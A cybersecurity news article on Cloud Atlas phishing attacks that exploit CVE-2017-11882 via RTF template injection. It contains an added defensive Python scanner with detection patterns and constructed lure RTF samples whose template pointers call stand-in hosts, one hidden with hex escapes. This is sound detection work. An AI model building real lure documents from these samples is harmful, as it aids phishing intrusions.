The threat actor known as Cloud Atlas has been linked to a set of spear-phishing attacks on Russian enterprises.

What are the goals of the Cloud Atlas hacker group

Targets included a Russian agroindustrial enterprise and a state-owned research company, according to a report by F.A.C.C.T., an independent cybersecurity firm formed after Group-IB's formal exit from Russia earlier this year.

Cloud Atlas, active since at least 2014, is a cyber espionage group of unknown origin. Also tracked as Clean Ursa, Inception, Oxygen and Red October, the group is known for its persistent campaigns targeting Russia, Belarus, Azerbaijan, Turkey and Slovenia.

In December 2022, Check Point and Positive Technologies detailed multi-stage attack sequences that led to the deployment of a PowerShell-based backdoor called PowerShower, as well as DLL payloads capable of communicating with an actor-controlled server.

The starting point is a phishing message carrying a lure document that exploits CVE-2017-11882, a six-year-old memory corruption flaw in Microsoft Office's Equation Editor, to kick off execution of the malicious payloads, a technique Cloud Atlas has employed since at least October 2018.

"The actor's massive spear-phishing campaigns continue to use its simple but effective methods in order to compromise its targets," Kaspersky noted in August 2019. "Unlike many other intrusion sets, Cloud Atlas hasn't chosen to use open source implants during its recent campaigns, in order to be less discriminative."

F.A.C.C.T. described the latest kill chain as similar to the one documented by Positive Technologies: successful exploitation of CVE-2017-11882 via RTF template injection paves the way for shellcode that downloads and runs an obfuscated HTA file. The emails originate from the popular Russian mail services Yandex Mail and VK's Mail.ru.

The malicious HTML application subsequently launches Visual Basic Script (VBS) files that are ultimately responsible for retrieving and executing an as-yet-unknown VBS payload from a remote server.
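The chain described above starts with a lure document, so the cheapest place to catch it is static triage of the attachment before Word ever opens it. The script below is an added example and not F.A.C.C.T.'s or Positive Technologies' tooling: it flags the two lure traits named in the article, an RTF template pointer (`{\*\template ...}`) that points to a remote resource, and Equation Editor 3.0 object markers that identify a CVE-2017-11882 target, without parsing the full OLE object. The RTF samples, the hostnames and the clean/suspicious/malicious scoring are all constructed for illustration.

```python
"""Static triage of an RTF lure for remote template injection and an
Equation Editor (CVE-2017-11882 target) object.

Added example; the sample documents, hostnames and verdict scoring are
constructed and are not taken from any real campaign.
"""
import re

# Word accepts files that begin with just "{\rt", so requiring "{\rtf1"
# would miss deliberately malformed lures.
RTF_MAGIC = re.compile(rb"^\s*\{\\rt", re.IGNORECASE)

# {\*\template <target>} is the pointer abused for RTF template injection.
TEMPLATE_RE = re.compile(rb"\{\\\*\\template\s*([^}]*)\}", re.IGNORECASE)
# RTF hex escape for one byte, e.g. \'68 -> 'h'; used to obscure the URL.
HEX_ESCAPE_RE = re.compile(rb"\\'([0-9a-fA-F]{2})")
# Remote targets only; a local .dotm path is normal for a template pointer.
# A UNC path is written in RTF with doubled backslashes, so "\\\\" matches it.
REMOTE_RE = re.compile(rb"^(?:https?://|ftp://|file://|\\\\)", re.IGNORECASE)

# Equation Editor 3.0 markers. \objclass carries the ProgID in clear text;
# \objdata carries the OLE payload hex-encoded, often split across lines.
EQN_OBJCLASS_RE = re.compile(rb"\\objclass\s*Equation\.3", re.IGNORECASE)
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9a-fA-F\s]+)", re.IGNORECASE)
EQN_PROGID_HEX = b"4571756174696f6e2e33"             # "Equation.3"
EQN_CLSID_HEX = b"02ce020000000000c000000000000046"   # {0002CE02-0000-0000-C000-000000000046}


def decode_template_target(raw: bytes) -> bytes:
    """Resolve \\'hh escapes and trim quotes/whitespace around the target.
    Other control words inside the destination are deliberately left alone
    so a UNC path (\\\\server\\share) is not mangled."""
    raw = HEX_ESCAPE_RE.sub(lambda m: bytes.fromhex(m.group(1).decode()), raw)
    return raw.strip().strip(b'"')


def find_remote_template(data: bytes):
    """Return the first remote template target as str, or None."""
    for m in TEMPLATE_RE.finditer(data):
        target = decode_template_target(m.group(1))
        if REMOTE_RE.match(target):
            return target.decode("latin-1")
    return None


def has_equation_editor_object(data: bytes) -> bool:
    """True if any embedded object advertises Equation Editor 3.0."""
    if EQN_OBJCLASS_RE.search(data):
        return True
    for m in OBJDATA_RE.finditer(data):
        hexblob = re.sub(rb"\s+", b"", m.group(1)).lower()
        if EQN_PROGID_HEX in hexblob or EQN_CLSID_HEX in hexblob:
            return True
    return False


def triage_rtf(data: bytes) -> dict:
    """Score one attachment. The verdict ladder is a constructed convention:
    both traits -> malicious, one trait -> suspicious, neither -> clean."""
    if not RTF_MAGIC.match(data):
        return {"is_rtf": False, "remote_template": None,
                "equation_editor": False, "verdict": "not-rtf"}
    remote = find_remote_template(data)
    eqn = has_equation_editor_object(data)
    if remote and eqn:
        verdict = "malicious"
    elif remote or eqn:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"is_rtf": True, "remote_template": remote,
            "equation_editor": eqn, "verdict": verdict}


# Constructed samples (not real malware). The objdata blob mimics an OLE1
# header: version 01050000, format 02000000, class-name length 0b000000,
# then "Equation.3\0" hex-encoded.
LURE_RTF = (
    b"{\\rt1\\ansi{\\*\\template http://templates.example.invalid/invoice.dotm}"
    b"{\\object\\objemb\\objclass Equation.3{\\*\\objdata 0105000002000000"
    b"0b000000\n4571756174696f6e2e3300}}\\par Please review the invoice.}"
)
OBFUSCATED_RTF = (
    b"{\\rtf1\\ansi{\\*\\template \\'68\\'74\\'74\\'70://evil.example.invalid/x.rtf}"
    b"\\par Agreement draft.\\par}"
)
BENIGN_RTF = (
    b"{\\rtf1\\ansi{\\*\\template C:\\\\Users\\\\me\\\\Normal.dotm}"
    b"\\par Quarterly report.\\par}"
)

if __name__ == "__main__":
    for name, blob in (("lure", LURE_RTF), ("obfuscated", OBFUSCATED_RTF),
                       ("benign", BENIGN_RTF)):
        print(name, triage_rtf(blob))
```

Two details matter in practice: the magic check accepts `{\rt` because Word does, and the template target is hex-unescaped before the scheme check, since a URL spelled as `\'68\'74\'74\'70://` would otherwise look local. The scanner only recognises the Equation Editor ProgID and CLSID; a sample that reaches the vulnerable code through a different object class would need the OLE stream parsed, which is deliberately out of scope here.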

"The Cloud Atlas group has been active for many years, carefully thinking through every aspect of their attacks," Positive Technologies said of the group last year, adding: "The group's toolkit has not changed for years; they try to hide their malware from researchers by using one-time payload requests and validating them. The group evades network and file attack detection tools by using legitimate cloud storage and well-documented software features, in particular in Microsoft Office."

The development comes as Positive Technologies said at least 20 organizations located in Russia have been compromised using Decoy Dog, a modified version of Pupy RAT, attributing the intrusions to an advanced persistent threat actor it calls Hellhounds.

The actively maintained malware, besides allowing the adversary to remotely control the infected host, comes with a scriptlet designed to transmit telemetry data to an "automated" account on Mastodon under the name "Lamir Hasabat" (@lahat) on the Mindly.Social instance.

"After the publication of materials about the first version of Decoy Dog, the malware authors have made a lot of effort to hinder its detection and analysis, both in traffic and in the file system," security researchers Stanislav Pyzhov and Aleksandr Grigorian said.